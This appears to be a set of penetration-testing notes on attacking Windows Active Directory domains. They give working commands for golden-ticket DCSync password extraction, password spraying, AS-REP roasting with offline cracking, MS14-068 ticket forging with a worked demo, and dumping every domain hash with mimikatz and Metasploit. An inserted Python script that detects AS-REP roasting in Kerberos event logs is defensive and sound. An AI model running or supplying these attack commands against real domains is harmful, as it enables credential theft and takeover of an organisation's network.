intra-domain attack
kerberos attack
Use golden ticket + dcsync to get password
- Get the Golden Ticket first
- get password
lsadump::dcsync /user:用户 /domain:域名称
success
Domain user, password enumeration
user enumeration
- import first
Import-Module .\DomainPasswordSpray.ps1
- then execute
Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
result
view userlist
password spray
- implement
Invoke-DomainPasswordSpray -Domain domainname -Password Passw0rd@ -OutFile pass.txt
That is, try Passw0rd@ against every user in the domain and report the accounts where it succeeds (of limited usefulness)
ASREPRoast
The ASREPRoast attack looks for users who do not require Kerberos pre-authentication. This means that anyone can send an AS_REQ to the KDC and receive an AS_REP on behalf of any of these users. That message contains a block of data encrypted with the user's key, which is derived from the user's password, so the password can be cracked offline from it.
use
- get hash
Rubeus.exe asreproast /format:john /outfile:hashes.txt
This command stores the extracted hashes in a txt file in a format that John the Ripper can crack
- Then you can use john to crack
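A defender-side check for the behaviour just described, added here and not part of the original notes: it scans TGT-request records (Windows Security event 4768, rendered below as constructed key=value lines of the kind a SIEM exports) for tickets issued without pre-authentication and with RC4 encryption, which is the trace an AS-REP roasting run leaves on the domain controller. The field names follow the 4768 event schema; the sample lines, IP addresses and account names are made up, and the per-source threshold is an assumption.

```python
import re

# Constructed sample 4768 (Kerberos TGT requested) records, flattened to
# key=value form. These are made-up for this example, not real log data.
SAMPLE_4768_EVENTS = [
    "TargetUserName=alice TargetDomainName=CORP.LOCAL IpAddress=10.0.0.5 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "TargetUserName=svc-backup TargetDomainName=CORP.LOCAL IpAddress=10.0.0.77 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "TargetUserName=bob TargetDomainName=CORP.LOCAL IpAddress=10.0.0.77 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "TargetUserName=carol TargetDomainName=CORP.LOCAL IpAddress=10.0.0.9 PreAuthType=2 TicketEncryptionType=0x17 Status=0x0",
    "TargetUserName=dave TargetDomainName=CORP.LOCAL IpAddress=10.0.0.5 PreAuthType=0 TicketEncryptionType=0x12 Status=0x6",
]

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened 4768 record into a dict of its fields."""
    return dict(KV_RE.findall(line))


def is_asreproast_candidate(event):
    # PreAuthType 0 means the TGT was requested without pre-authentication,
    # which is the condition the roasting tools depend on. 0x17 is RC4-HMAC,
    # the encryption type Rubeus asks for because it is cheapest to crack.
    # Status 0x0 means the KDC really issued the ticket; a failed request
    # (e.g. 0x6, client not found) yields nothing crackable.
    return (event.get("PreAuthType") == "0"
            and event.get("TicketEncryptionType") == "0x17"
            and event.get("Status") == "0x0")


def find_roasting_activity(lines, min_accounts=1):
    """Return {source_ip: [accounts]} for every source that obtained
    RC4, no-preauth TGTs for at least `min_accounts` distinct accounts."""
    by_source = {}
    for line in lines:
        ev = parse_event(line)
        if is_asreproast_candidate(ev):
            by_source.setdefault(ev["IpAddress"], set()).add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_source.items()
            if len(users) >= min_accounts}


if __name__ == "__main__":
    for ip, users in find_roasting_activity(SAMPLE_4768_EVENTS).items():
        print(f"possible AS-REP roasting from {ip}: {', '.join(users)}")
```

Accounts that keep turning up here should have the "Do not require Kerberos preauthentication" flag reviewed, since removing it closes the window the attack uses.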
Intra-domain privilege escalation
MS14-068
Prerequisites
- Unpatched (KB3011780)
- a domain machine
- has its sid and password
use
- Generate a forged Kerberos ticket
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControllerAddr>
demo
- get sid
whoami /user
- grab the domain password with mimikatz if you don't know it
- Generate the forged Kerberos ticket
MS14-068.exe -u [email protected] -p user2008. -s S-1-5-21-1031516656-1656020465-3194443236-1140 -d 192.168.95.10
- Load it with mimikatz
kerberos::ptc xxx.ccache
Injected successfully
Elevated to domain admin user
Reproducing this on Windows Server 2012 was unsuccessful, but it worked well on Server 2008
Domain hash capture
Assume that you have obtained domain administrator rights
tool: mimikatz
There may be a lot of data, so start a log first
log
Then
lsadump::dcsync /domain:<domainname> /all /csv
I'm not sure why some parameters are missing; you can also use the following
lsadump::lsa /inject
You can also use the domain_hashdump module of msf